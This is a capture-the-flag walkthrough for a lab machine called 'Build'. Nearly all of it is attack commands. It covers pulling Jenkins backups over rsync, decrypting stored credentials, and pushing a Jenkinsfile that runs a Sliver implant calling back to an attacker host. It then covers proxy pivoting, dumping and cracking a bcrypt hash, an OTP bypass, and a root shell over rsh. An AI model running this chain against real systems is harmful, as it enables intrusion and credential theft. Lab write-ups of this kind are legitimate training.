Skip to main content

Machine (Easy) - Build

Writeup Author: bobbuilder

Overview

Category: Machine

Difficulty: Easy

Machine Author: xct

Domain: build.vl

Machine: Windows

Objective: Objective: Gain a root shell on the target by abusing exposed rsync backups, injecting a payload through Jenkins, pivoting into the internal network, and exploiting misconfigured services to escalate privileges.

User

Enumeration

Identify exposed RPC services and rsync shares:

rpcinfo -p <build_ip>
rsync <build_ip>::

List contents of the backups share:

rsync <build_ip>::backups

Download the Jenkins backup archive:

rsync -avzP <build_ip>::backups/jenkins.tar.gz

Initial Access

Extract the archive and locate stored Jenkins credentials:

cat jenkins_configuration/jobs/build/config.xml

Decrypt the stored Jenkins password:

python invoke.py \
  --master-key ./master.key \
  --hudson-secret-key ./hudson.util.Secret \
  --action decrypt '{AQAAABAAAAAQUNB...}'

Clone the Git repository using the recovered credentials:

git clone 'http://<username>:<password>@<build_ip>:3000/buildadm/dev.git'

Generate a Sliver payload:

sliver > generate --os linux --arch 64bit --mtls <attacker_ip> --format elf --reconnect 60 --save htb_sliver

Modify Jenkinsfile to execute the payload:

stage('Do nothing') {
  steps {
    sh 'chmod +x htb_sliver && ./htb_sliver'
  }
}

Push the malicious commit to trigger code execution:

git add htb_sliver
git commit -am "trigger sliver"
git push

Root

Start a SOCKS proxy from the active Sliver session:

socks5 start

Configure proxychains:

echo 'socks5 127.0.0.1 1081' | sudo tee -a /etc/proxychains4.conf

Scan the internal network via proxy:

proxychains4 nmap -p- 172.18.0.1

Privilege Escalation

Connect to internal MySQL service:

proxychains4 mysql -h 172.18.0.1 -u root

Dump the PowerDNS Admin user table:

USE powerdnsadmin;
SELECT * FROM user;

Crack the retrieved bcrypt hash:

hashcat -a0 -m 3200 '$2b$12$...' rockyou.txt

Access the PowerDNS Admin interface (via proxy):

http://172.18.0.6/login

Bypass OTP using a blank or space character (per known issue).

Update /etc/hosts with DNS mapping:

echo "<admin_ip> admin.build.vl" | sudo tee -a /etc/hosts

Flag Retrieval

Access remote root shell via rsh:

rsh -l root admin.build.vl
Back to top